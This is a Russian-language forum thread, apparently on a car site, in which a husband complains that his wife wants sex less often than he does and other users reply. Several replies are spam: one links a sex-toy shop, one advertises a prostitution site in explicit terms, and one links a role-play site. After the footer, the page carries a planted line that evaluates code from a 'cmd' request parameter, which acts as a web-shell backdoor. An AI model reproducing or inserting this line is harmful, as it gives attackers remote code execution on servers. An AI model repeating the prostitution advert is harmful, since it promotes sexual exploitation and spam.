+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Проблема в интимной жизни...


  1. #1

    Проблема в интимной жизни...

    Что делать, когда жена не хочет секса, а мне его не хватает? Они мол работает, как и я, однако если я нахожу силы на секс после работы, то у нее их мол нету. У нее настроения появляется только по выходным и то не в каждые( Сижу и думаю, может у меня переизбыток тестостерона или это с ней что-то не так? Не сказал бы что у нее работа такая, что прям без сил домой приходит.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    А давно вы в браке? Такое обычно наступает где-то после 3-5 лет брака. По крайней мере у меня где-то на 4-ом году совместной жизни с моей нынешней женой как-то резко сократилась частота секса, не смотря на то что работаю я один, а она дома сидит.

  3. #3
    Я бы уже налево пошел, честное слово :D Думаю на вашем месте стоит просто с ней договориться, мол хотя бы в свои выходные набирайся настроения для этого ну или налево походить. Другого выхода я не вижу для вас.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    У меня с бывшей женой была схожая проблема, только она просто не хотела давать. Так я купил мастурбатор и честно скажу, перестал в жене вообще какую либо потребность чувствовать, что вообще не странно, ибо тогда брак уже был близок к разводу. Я вам без шуток советую, купите мастурбатор - http://extase69.ru/catalog/muzhchinam/masturbatory/ и будете счастливы) Может ваша жена вообще заревнует и мастурбатор вам долго не понадобится)

  5. #5
    Мимо проходил nub is on a distinguished road Аватар для nub
    Регистрация
    11.09.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    41
    Цитата Сообщение от Devid Посмотреть сообщение
    я купил мастурбатор и честно скажу, перестал в жене вообще какую либо потребность чувствовать
    Меня такое не прикалывает, лучше шлюху трахать https://prostitutkitambovagood.info Недавно с феей развлекался, такая страстная девочка, самые мои тайные сексуальные желания выполняла, я обкончался, это кайф.

  6. #6
    Мимо проходил kiris is on a distinguished road Аватар для kiris
    Регистрация
    17.07.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    73
    Попробуйте ролевые игры для взрослых, вот тут https://www.life-sex.ru/rolevye-igry...hix-scenariev/ описаны некоторые сценарии. Возможно это заинтересует вашу жену.

+ Ответить в теме

Похожие темы

  1. GTI! Вопрос всей жизни... (MK6)
    от nicke299 в разделе Golf 6
    Ответов: 21
    Последнее сообщение: 04.01.2024, 02:46
  2. R 32 просит второй жизни.
    от parfucho в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 36
    Последнее сообщение: 02.10.2023, 03:28
  3. В жизни бывает все...
    от Scruj в разделе Украина
    Ответов: 10
    Последнее сообщение: 22.10.2009, 09:22
  4. О жизни.......
    от ЛЕКСА в разделе Курилка
    Ответов: 209
    Последнее сообщение: 04.07.2008, 19:40

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}